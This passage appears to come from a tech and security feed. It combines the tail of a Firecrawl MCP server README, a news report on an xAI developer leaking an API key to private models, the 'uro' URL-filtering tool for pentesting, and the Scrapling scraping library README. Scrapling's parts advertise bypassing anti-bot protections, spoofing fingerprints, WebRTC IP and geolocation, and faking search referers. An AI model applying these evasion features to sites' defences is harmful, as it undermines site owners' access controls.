"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};

These configurations control:

  1. Retry Behavior

  2. Automatically retries failed requests due to rate limits

  3. Uses exponential backoff to avoid overwhelming the API
  4. Example: With default settings, retries will be attempted at:

    • 1st retry: 1 second delay
    • 2nd retry: 2 seconds delay
    • 3rd retry: 4 seconds delay (capped at maxDelay)
  5. Credit Usage Monitoring

  6. Tracks API credit consumption for cloud API usage
  7. Provides warnings at specified thresholds
  8. Helps prevent unexpected service interruption
  9. Example: With default settings:
    • Warning at 1000 credits remaining
    • Critical alert at 100 credits remaining

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

Response includes operation ID for status checking:

{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}

Example response:

{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



xAI Dev Leaks API Key for Private SpaceX, Tesla LLMs

An employee at Elon Musk’s artificial intelligence company xAI leaked a private key on GitHub that for the past two months could have allowed anyone to query private xAI large language models (LLMs) which appear to have been custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X, KrebsOnSecurity has learned.

Image: Shutterstock, @sdx15.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, was the first to publicize the leak of credentials for an x.ai application programming interface (API) exposed in the GitHub code repository of a technical staff member at xAI.

Caturegli’s post on LinkedIn caught the attention of researchers at GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

GitGuardian’s Eric Fourrier told KrebsOnSecurity the exposed API key had access to several unreleased models of Grok, the AI chatbot developed by xAI. In total, GitGuardian found the key had access to at least 60 fine-tuned and private LLMs.

“The credentials can be used to access the X.ai API with the identity of the user,” GitGuardian wrote in an email explaining their findings to xAI. “The associated account not only has access to public Grok models (grok-2-1212, etc) but also to what appears to be unreleased (grok-2.5V), development (research-grok-2p5v-1018), and private models (tweet-rejector, grok-spacex-2024-11-04).”

Fourrier found GitGuardian had alerted the xAI employee about the exposed API key nearly two months ago — on March 2. But as of April 30, when GitGuardian directly alerted xAI’s security team to the exposure, the key was still valid and usable. xAI told GitGuardian to report the matter through its bug bounty program at HackerOne, but just a few hours later the repository containing the API key was removed from GitHub.

“It looks like some of these internal LLMs were fine-tuned on SpaceX data, and some were fine-tuned with Tesla data,” Fourrier said. “I definitely don’t think a Grok model that’s fine-tuned on SpaceX data is intended to be exposed publicly.”

xAI did not respond to a request for comment. Nor did the 28-year-old xAI technical staff member whose key was exposed.

Carole Winqwist, chief marketing officer at GitGuardian, said giving potentially hostile users free access to private LLMs is a recipe for disaster.

“If you’re an attacker and you have direct access to the model and the back end interface for things like Grok, it’s definitely something you can use for further attacking,” she said. “An attacker could it use for prompt injection, to tweak the (LLM) model to serve their purposes, or try to implant code into the supply chain.”

The inadvertent exposure of internal LLMs for xAI comes as Musk’s so-called Department of Government Efficiency (DOGE) has been feeding sensitive government records into artificial intelligence tools. In February, The Washington Post reported DOGE officials were feeding data from across the Education Department into AI tools to probe the agency’s programs and spending.

The Post said DOGE plans to replicate this process across many departments and agencies, accessing the back-end software at different parts of the government and then using AI technology to extract and sift through information about spending on employees and programs.

“Feeding sensitive data into AI software puts it into the possession of a system’s operator, increasing the chances it will be leaked or swept up in cyberattacks,” Post reporters wrote.

Wired reported in March that DOGE has deployed a proprietary chatbot called GSAi to 1,500 federal workers at the General Services Administration, part of an effort to automate tasks previously done by humans as DOGE continues its purge of the federal workforce.

A Reuters report last month said Trump administration officials told some U.S. government employees that DOGE is using AI to surveil at least one federal agency’s communications for hostility to President Trump and his agenda. Reuters wrote that the DOGE team has heavily deployed Musk’s Grok AI chatbot as part of their work slashing the federal government, although Reuters said it could not establish exactly how Grok was being used.

Caturegli said while there is no indication that federal government or user data could be accessed through the exposed x.ai API key, these private models are likely trained on proprietary data and may unintentionally expose details related to internal development efforts at xAI, Twitter, or SpaceX.

“The fact that this key was publicly exposed for two months and granted access to internal models is concerning,” Caturegli said. “This kind of long-lived credential exposure highlights weak key management and insufficient internal monitoring, raising questions about safeguards around developer access and broader operational security.”

Uro - Declutters Url Lists For Crawling/Pentesting

By: Unknown


Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/ and /page/2/ - blog posts and similar human written content e.g. /posts/a-brief-history-of-time - urls with same path but parameter value difference e.g. /page.php?id=1 and /page.php?id=2 - images, js, css and other "useless" files


Installation

The recommended way to install uro is as follows:

pipx install uro

Note: If you are using an older version of python, use pip instead of pipx

Basic Usage

The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

cat urls.txt | uro

Advanced usage

Reading urls from a file (-i/--input)

uro -i input.txt

Writing urls to a file (-o/--output)

If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

uro -i input.txt -o output.txt

Whitelist (-w/--whitelist)

uro will ignore all other extensions except the ones provided.

uro -w php asp html

Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Blacklist (-b/--blacklist)

uro will ignore the given extensions.

uro -b jpg png js pdf

Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Filters (-f/--filters)

For granular control, uro supports the following filters:

  1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
  2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
  3. hasext: only output urls that have extensions e.g. http://example.com/page.php
  4. noext: only output urls that have no extensions e.g. http://example.com/page
  5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
  6. keepcontent: keep human written content e.g. blogs.
  7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
  8. vuln: only output urls with parameters that are know to be vulnerable. More info.

Example: uro --filters hasexts hasparams



Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • 🔄 Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • 🔍 Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • 🚀 Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • 🔋 Memory Efficient: Optimized data structures for minimal memory footprint.
  • Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • 🛠️ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • 📝 Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • 🔌 Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • 📘 Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods and it returns full element Adaptor objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers which makes Fetcher create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher methods is 3.

Hence: All headers generated by stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | ✔️ | | block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | ✔️ | | extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | ✔️ | | block_webrtc | Blocks WebRTC entirely. | ✔️ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ | | addons | List of Firefox addons to use. **Must be paths to extracted addons.** | ✔️ | | humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | ✔️ | | allow_webgl | Enabled by default. Disabling it WebGL not recommended as many WAFs now checks if WebGL is enabled. | ✔️ | | geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | ✔️ | | disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | ✔️ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ | | wait_selector | Wait for a specific css selector to be in a specific state. | ✔️ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ | | os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | ✔️ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode option.

Hence using the real_chrome argument requires that you have Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | ✔️ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ | | useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | ✔️ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ | | wait_selector | Wait for a specific css selector to be in a specific state. | ✔️ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | ✔️ | | extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | ✔️ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ | | hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | ✔️ | | disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | ✔️ | | stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | ✔️ | | real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | ✔️ | | locale | Set the locale for the browser if wanted. The default value is `en-US`. | ✔️ | | cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | ✔️ | | nstbrowser_mode | Enables NSTBrowser mode, **it have to be used with `cdp_url` argument or it will get completely ignored.** | ✔️ | | nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
# do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

